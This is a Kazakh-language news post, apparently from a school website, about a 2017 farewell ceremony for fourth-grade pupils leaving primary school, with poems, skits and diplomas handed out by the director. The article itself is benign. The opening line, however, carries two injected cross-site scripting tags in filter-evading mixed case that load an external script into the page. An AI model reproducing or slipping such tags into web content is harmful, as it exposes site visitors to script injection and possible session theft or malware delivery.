<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.05.2017

Бастауыш мектеп... Оқушы өмірінің басты қалауы. Төрт жыл бұрын өз құрбыларымен, сынып жетекшілерімен қол ұстасып алғаш мектеп табалдырығын аттаған бүлдіршіндер, бүгінде бастауыш сыныппен қоштасқалы отыр. Дәптердегі алғашқы таяқшалар, дәптердегі сандар және Әліппедегі алғашқы әріптер.Ия бұл төрт жылда зымырап өте шықты. Кешегі бірінші сынып бүлдіршіндері бүгінде салмақты болып сап түзеп салтанатты жиында, көңілді, ашық және де аздап ойланып тұрғандай.  Бастауыш мектеппен қоштасу біздің мектепте жылдағы дәстүрге айналған. «Қош бол, бастауышым!» мерекесі аздап мұңдыда бірақ қуанышты және көңілді өтті. Оқушылар мектеп, достық туралы өлеңдер оқып, мектеп өмірінен қызықты сахналық қойылымдар қойды. 4 сынып түлектерінің ата-аналарымен және бастауыш сынып түлектері мұғалімдерге деген жылы лебіздерін құттықтау сөздерімен білдірді. Мерекеде мектеп директоры Смағұлова Кенжетай Джамболқызыда болды. Мектеп директоры төртінші сынып оқушыларын бастауыш сынып мектепті аяқтау мерекесімен құттықтап, балалардың жазғы демалыста  демалып, күштерін жинап, ортаңғы кезеңнің оқушылары атағына ие болуларын тіледі. Кенжетай Джамболқызы мектеп өмірінде белсенді қатысып, мектепті жақсы аяқтағандары үшін және бастауыш мектепті аяқтау туралы Дипломдарымен марапаттады. Бұл мереке әрқашан балалардың жадында қалсын дейміз! Ал болашақта оларды тек қана жаңа жеңістер мен сәттілік, жетістіктер күтсін.

 

 

Просмотров: 814


Пікір қосу



Деректерді қолтаңбаға қосу